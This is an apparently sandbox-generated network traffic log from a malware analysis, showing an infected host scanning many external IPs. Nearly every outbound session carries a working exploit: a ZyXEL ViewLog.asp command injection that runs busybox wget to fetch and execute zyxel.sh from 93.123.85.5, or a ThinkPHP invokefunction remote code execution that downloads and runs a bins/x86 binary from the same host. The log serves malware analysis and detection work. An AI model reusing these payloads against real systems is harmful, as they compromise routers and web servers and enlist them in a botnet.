                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 31 37 65 31 39 62 38 26 23 34 36 3b 31 36 39 39 39 31 30 33 34 30 26 23 34 36 3b 32 34 37 38 31 33 37 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;517e19b8&#46;1699910340&#46;2478137d</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              34192.168.2.233631694.122.77.948080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:12.546138048 CET1650OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              340192.168.2.234601695.31.44.15180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.539073944 CET7457OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:00.879968882 CET7555INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:00 GMT
                                                              Server: Apache/2.4.52 (Unix) OpenSSL/3.0.1
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              341192.168.2.234376295.0.21.1980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.880381107 CET7556OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              342192.168.2.235466495.255.45.338080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:01.190449953 CET7575OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:01.544157028 CET7582INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 20:25:50 GMT
                                                              Server: Apache
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              343192.168.2.235710631.220.89.58080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:01.490973949 CET7579OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              344192.168.2.235740085.164.202.2368080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:01.514683962 CET7580OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:01.839369059 CET7679INHTTP/1.1 404 Not Found
                                                              Content-Type: text/plain
                                                              Content-Length: 30
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              345192.168.2.234866288.198.108.14080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:01.521650076 CET7580OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:01.825434923 CET7668INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:01 GMT
                                                              Server: Apache/2.4.41 (Fedora) PHP/5.6.40
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              346192.168.2.236048694.122.230.398080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:01.536634922 CET7581OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              347192.168.2.235366288.113.100.23780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:01.547811031 CET7583OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:01.877810001 CET7680INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              348192.168.2.233898495.142.87.288080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:01.590703011 CET7583OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:01.990464926 CET7682INHTTP/1.1 404 Not Found
                                                              Date: Tue, 14 Nov 2023 02:19:00 GMT
                                                              Server: Webs
                                                              X-Frame-Options: SAMEORIGIN
                                                              Cache-Control: no-cache
                                                              Content-Length: 166
                                                              Content-Type: text/html
                                                              Connection: keep-alive
                                                              Keep-Alive: timeout=60, max=99
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              349192.168.2.235193295.101.198.2080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.179460049 CET7806OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:03.472873926 CET7815INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:19:03 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:03 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 65 37 37 31 33 30 32 26 23 34 36 3b 31 36 39 39 39 31 30 33 34 33 26 23 34 36 3b 34 34 30 30 30 39 30 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;1e771302&#46;1699910343&#46;44000907</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              35192.168.2.235102295.130.153.11780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:13.712116957 CET1774OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:14.013624907 CET1870INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.18.0 (Ubuntu)
                                                              Date: Mon, 13 Nov 2023 21:18:13 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              350192.168.2.235572295.161.64.2280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.183217049 CET7807OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              351192.168.2.235167294.122.65.1038080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.350174904 CET7812OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              352192.168.2.234385095.128.132.2180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.478286028 CET7816OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:03.773514032 CET7887INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:19:05 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              353192.168.2.233563685.17.204.998080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.658356905 CET7821OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              354192.168.2.235711462.28.93.688080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.662065983 CET7821OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:03.976062059 CET7924INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 22:27:22 GMT
                                                              Server: DNVRS-Webs
                                                              Cache-Control: no-cache
                                                              Content-Length: 166
                                                              Content-Type: text/html
                                                              Connection: keep-alive
                                                              Keep-Alive: timeout=60, max=99
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              355192.168.2.233525631.136.242.2298080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.688962936 CET7882OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
